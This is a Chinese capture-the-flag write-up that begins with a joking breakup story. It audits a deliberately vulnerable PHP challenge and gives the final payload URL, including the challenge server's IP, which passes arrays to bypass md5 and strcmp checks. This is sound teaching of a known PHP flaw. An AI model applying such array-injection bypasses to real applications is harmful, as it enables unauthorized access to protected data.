0、打开网页,有一段“凄美”的爱情故事(哈哈哈!)
分手了,纠结再三我没有拉黑她,原因无它,放不下。
终于那天,竟然真的等来了她的消息:“在吗?”
我神色平静,但颤抖的双手却显示出我此刻的激动。“怎么了?有事要我帮忙?”
“怎么,没事就不能联系了吗?”结尾处调皮表情,是多么的陌生和熟悉……
“帮我看看这个...”说着,她发来一个链接。
不忍心拂她的意就点开了链接,看着屏幕我的心久久不能平静,往事一幕幕涌上心头......
。。。。。。
“我到底做错了什么,要给我看这个!”
“还记得你曾经说过。。。。。。。。”
PHP是世界上最好的语言
发现其中有一个链接
1、点击链接,查看PHP源代码
<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
$v1 = $_GET['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
if($v1 != $v2 && md5($v1) == md5($v2)){
if(!strcmp($v3, $flag)){
echo $flag;
}
}
}
?>2、代码审计,构造payload
我们需要构造三个参数:v1,v2,v3,其中v1和v2需要值不同且md5的值相同,利用md5函数的特性,如果使用一个不可md5的数据类型传入的话那么md5函数将返回false,这个也是返回值,题目要求的是md5函数的返回值相等,所以就可以用两个值不同但不可md5的数据类型传入即可
这里我们使用数组进行绕过,令v1[]=1, v2[]=2
继续分析,第二个是strcmp函数,需要v3和flag的值相同才返回flag的值,我们依旧利用函数特性,strcmp函数如果出错,那么它的返回值也会是0,和字符串相等时返回值一致,
依旧使用数组绕过,令v3[]=3
3、上传最终payload:http://114.67.246.176:16109/?v1[]=1,&&v2[]=2&&v3[]=3
